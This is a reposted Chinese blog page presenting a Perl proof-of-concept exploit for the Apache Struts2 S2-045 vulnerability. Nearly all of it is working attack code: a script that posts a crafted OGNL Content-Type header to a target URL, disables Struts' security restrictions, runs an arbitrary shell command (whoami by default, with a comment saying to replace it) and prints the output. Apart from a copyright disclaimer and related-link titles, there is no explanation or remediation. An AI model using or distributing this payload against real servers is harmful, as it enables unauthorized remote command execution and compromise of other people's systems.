st2-045漏洞利用poc

本文转载自查看原文 2017-03-08 01:40 1830 Perl tools/ perl5/6 网络编程学习

 1 use LWP::UserAgent;
 2 
 3 undef $/;
 4 if(@ARGV != 1){print "Use:poc.pl http://target/index.action\n";exit;}
 5 my $url = shift;
 6 my $ua = LWP::UserAgent->new;
 7 my $req = HTTP::Request->new(POST => $url);
 8 my $head = <DATA>;
 9 $req->content_type($head);
10 11 my $rep = $ua->request($req);
12 print $rep->content;
13 
14 
15 
16 #如要修改命令， 请把24行的whoami修改为相当的命令就行
17 __DATA__
18 %{(#nike='multipart/form-data').
19 (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
20 (#_memberAccess?(#_memberAccess=#dm):
21 ((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
22 (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
23 (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
24 (#context.setMemberAccess(#dm)))).(#cmd='whoami').
25 (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).
26 (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).
27 (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).
28 (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().
29 getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).
30 (#ros.flush())}

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复 i春秋实验--struts2远程命令执行S2-045漏洞利用与修复 XSS漏洞的poc与exp 2021HW期间公布的部分漏洞及利用方式（部分附POC、EXP） 2021HW期间公布的部分漏洞及利用方式（部分附POC、EXP） S2-045漏洞初步分析漏洞文库合集(POC EXP) ThinkPHP 5 代码执行漏洞复现+POC CVE-2018-4407 漏洞复现POC